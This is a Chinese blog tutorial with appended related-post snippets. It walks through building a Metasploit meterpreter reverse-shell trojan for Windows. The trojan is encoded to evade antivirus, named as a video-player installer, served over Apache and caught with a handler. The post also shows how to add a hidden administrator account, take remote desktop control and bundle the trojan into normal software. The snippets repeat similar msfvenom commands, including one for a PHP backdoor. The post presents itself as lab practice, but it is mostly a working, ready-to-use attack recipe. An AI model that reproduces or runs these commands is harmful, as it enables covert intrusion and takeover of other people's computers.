msf_木马

已于 2022-03-22 09:00:37 修改
阅读量2.3k 收藏 20
点赞数
分类专栏: 木马 文章标签: linux 系统安全
于 2020-05-13 16:25:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/jinhezhai/article/details/106043370
版权

使用kali虚拟机生成木马使win7虚拟机中毒,并控制kali虚拟机

1.制作木马

打开kali虚拟机

在这里插入图片描述

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=4444 -b " x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/ 西瓜影音 .exe
使用msfvenom生成木马,
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。
msfvenom是msf的一个模块。

解释一下代码。

-a 指定架构如 x 86 x64
x86对应的32位系统,x64对应64位系统。
–platform 指定平台
-p 指定 payload
windows/meterpreter/reverse_tcp是msf木马的类型,可以通过打开msf输入show payload来查看payload

LHOST
目标主机执行程序后连接我们 Kali 的地址
LPORT
目标主机执行程序后连接我们 Kali 的端口
-e是指定了一种编码器,增加了木马的免杀能力。
-i后面参数说明编码几次
-f指定木马生成的类型
-o后面指定木马生成的路径及名字
-b 去掉坏字符,坏字符会影响 payload 正常执行。
在这里插入图片描述
ls /var/www/html/
查看该文件下是否生成木马

systemctl start apache2

打开apache2服务器

2打开监听

在这里插入图片描述

依次输入
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost ip
set lport 端口
exploit

set payload windows/meterpreter/reverse_tcp
set lhost ip
set lport 端口这这三个是你生成木马时填的一样。

3.将木马植入目标机

ifconfig查看kali的IP地址。
在这里插入图片描述

在目标机上输入ip/文件名下载木马。
下载后点击运行。
在这里插入图片描述
表明监听到了,
使用run vnc查看中毒机器实时页面

在这里插入图片描述在这里插入图片描述

4.提权操作

dir查看中毒机器下目录的其它文件
sysinfo查看目标机的电脑的一些信息
run getgui -u 用户名 -p 密码 建立一个用户
shell可以进入中毒机器的命令行
net localgroup administrators 用户名 /add 可以给你刚刚创建用户一个管理员权限
可以使用3389端口远程连接·
rdesktop id
输入刚刚创建的账户,即可远程连接。

5.捆绑软件

通过下载捆绑软件,将木马与正常软件绑定。

渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 4742
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
【网络安全】 MSF生成木马教程
一直被模仿,从未被超越
03-13 2174
1、当客户端点击木马后,Kali 成功获取。2、启动Apache,方便客户端下载。1、在Kali机器上面生成木马。本例用的是 Themida。二、Kali 开启监听。2、设置Payload。
msf木马程序
ZZ100861122的博客
11-10 723
目录 捆绑木马 生成木马文件 附:msfvenom介绍 msfvenom简介 msfvenom生成 exploit/multi/handler模块简介 设置监听反弹 发送木马 查看对方的ip 查看对方目录 截图 开启摄像头 附:Meterpreter常用命令 进一步获取权限 伪装 捆绑木马 这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134 生成木马文件 首先上传一个正常的安装包到kali里面 我这里下了一个QQ 在这里插入图片描述 把它
木马免杀之MSFVenom制作木马
最新发布
没有网络安全就没有国家安全
03-09 1448
木马免杀之MSFVenom制作木马
msf学习之木马
fake_hydra的博客
07-29 2142
msfpayload windows/meterpreter/reverse_tcp LHOST=10.24.194.155 LPORT=55555 X >text.exe 生成一个text.exe的木马文件 msf > use exploit/multi/handler 使用handler这个模块 msf exploit(
msf生成木马
qq_44657899的博客
04-03 4357
Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe msfvenom -p windows/meterpreter/bind_tcp LPORT=<Attack Port> -f dll >/root/bind_xx.dll msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST
msf木马
fsociety_h4cker的博客
03-15 532
msf生成木马攻击Windows 此攻击手段用于kali(基于debian用于数字取证的操作系统) 首先
msf使用木马控制android手机
my_name_is_sy的博客
05-18 2870
使用msfvenom生成木马控制手机
MSF回弹木马ubuntu测试
Thewei666的博客
08-02 653
网站地址为192.168.104.128linux版本信息:20.04.1-Ubuntunginx信息:nginx-1.21.6php信息:PHP 7.3.33-19php-fpm信息:/etc/php/7.3/fpm/php-fpm.conf。
msf生成php木马,11.7 Weevely3生成网页木马、Backcookie后门生成工具、使用msf生成木马、一句话变形技巧和使用...
weixin_36005427的博客
03-27 2029
大马:代码量大,体积大,可以和一句话木马配合使用(先传一句话后传大马),一般同意被发现,可变形或伪装(编码、远程接入),主要功能:文件管理、,命令执行、数据库管理、清理木马、屑木马、收集信息、提权等。Webshell管理工具的介绍和使用:Webshell工具主要和一句话配合使用中国菜刀、中国蚁剑等Weevely3生成网页木马(基于python)python weevely.py -h python...
2024年网络安全最新【网络安全】 MSF生成木马教程
2401_84281712的博客
05-03 418
这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新**2、查看权限,当客户机是普通用户登录的话,此时获取到的就是一个普通 user 权限。1、当出现 meterpreter,表示成功入侵。2、设置Payload。
msf免杀木马生成
qq_66985187的博客
07-04 2601
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msfmsfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
MSF生成木马木马的简单使用
爱喝水的仙人树的博客
11-03 9918
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
【内网安全】——msf木马生成教程
Demo不是emo的博客
01-30 6004
msfvenom生成木马教程
003-MSF恶程木马+cs上线
qq_57017823的博客
08-31 521
msfvenom,钓鱼攻击,键盘监听
kali使用msf简单制作木马
热门推荐
m0_53820621的博客
11-15 1万+
命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 -f exe -o /root/csdn.exe 命令分解: msfvenom #使用msfmsfvenom模块 -a #指定架构(x86指32位,x64为64位,建议x86,因为x64兼容x86,在不知道目标机架构的情况下x86更为合适) -p #指定p
msf渗透练习-生成木马控制window系统
weixin_49349476的博客
06-12 5125
利用kali的msf工具生成木马window木马,对目标window主机进行控制,本次练习仅用于学习,不要用于非法用途(做个好白帽)
MSF(2)——各种木马的生成及简单的免杀
realmels的博客
06-11 4845
这里是各种木马的生成示例 在实际渗透过程中根据需求生成这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密可参考前文 https://blog.youkuaiyun.com/realmels/article/details/119280877重点来了使用上文方法生成的木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可
木马的攻击与防御(MSF
weixin_45605352的博客
04-12 7426
MSF简介 Metasploit是一个免费的、可下载的框架, 通过它可以很容易地 获取、开发并对计算机软件漏洞实施攻击。它本身 附带数百个 已知软件漏洞的专业级漏洞攻击工具。它集成了以下4个模块: exploits模块 漏洞攻击模块列表,入侵式 命名规则 模块/系统/服务/名称 payloads模块 漏洞负载模块与exploits模块配合使用的用于入侵后的操作 auxiliary模块 辅助模块,通常用于没有攻击荷载的漏洞攻击。 encoders模块 编码器模块,用于msfvenom -e or
MSF生成木马php
01-08
### 使用Metasploit Framework创建PHP后门 为了使用Metasploit Framework(MSF)创建一个PHP后门,可以采用`msfvenom`工具来生成所需的恶意脚本。此过程涉及几个关键步骤。 #### 准备工作环境 确保已安装并配置好Metasploit框架。通过终端访问该平台,并确认能够正常调用`msfvenom`命令[^1]。 #### 生成PHP Payload 利用`msfvenom`生成适用于Web应用程序的PHP类型的Payload。下面是一个具体的例子: ```bash msfvenom -p php/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=your_port -f raw > shell.php ``` 这段指令指定了反向TCP连接作为通信方式(`reverse_tcp`),并将最终输出保存为名为`shell.php`的文件。这里的`LHOST`参数应替换为攻击者控制下的IP地址,而`LPORT`则代表监听端口号[^4]。 #### 配置Exploit Handler 一旦成功上传并执行了上述生成的PHP代码到目标服务器上,就需要准备接收来自受害者的回调请求。这可以通过启动一个多处理器处理程序(exploit/multi/handler)实现: ```plaintext msfconsole # 启动MSF控制台 use exploit/multi/handler # 加载多处理器模块 set payload php/meterpreter/reverse_tcp # 设定与之前一致的有效负载类型 set lhost your_ip_address # 设置本地监听IP set lport your_port # 设置本地监听端口 exploit # 开始监听 ``` 当受害者浏览含有嵌入式PHP Shell页面时,就会触发Meterpreter会话建立,从而允许进一步操作目标系统[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值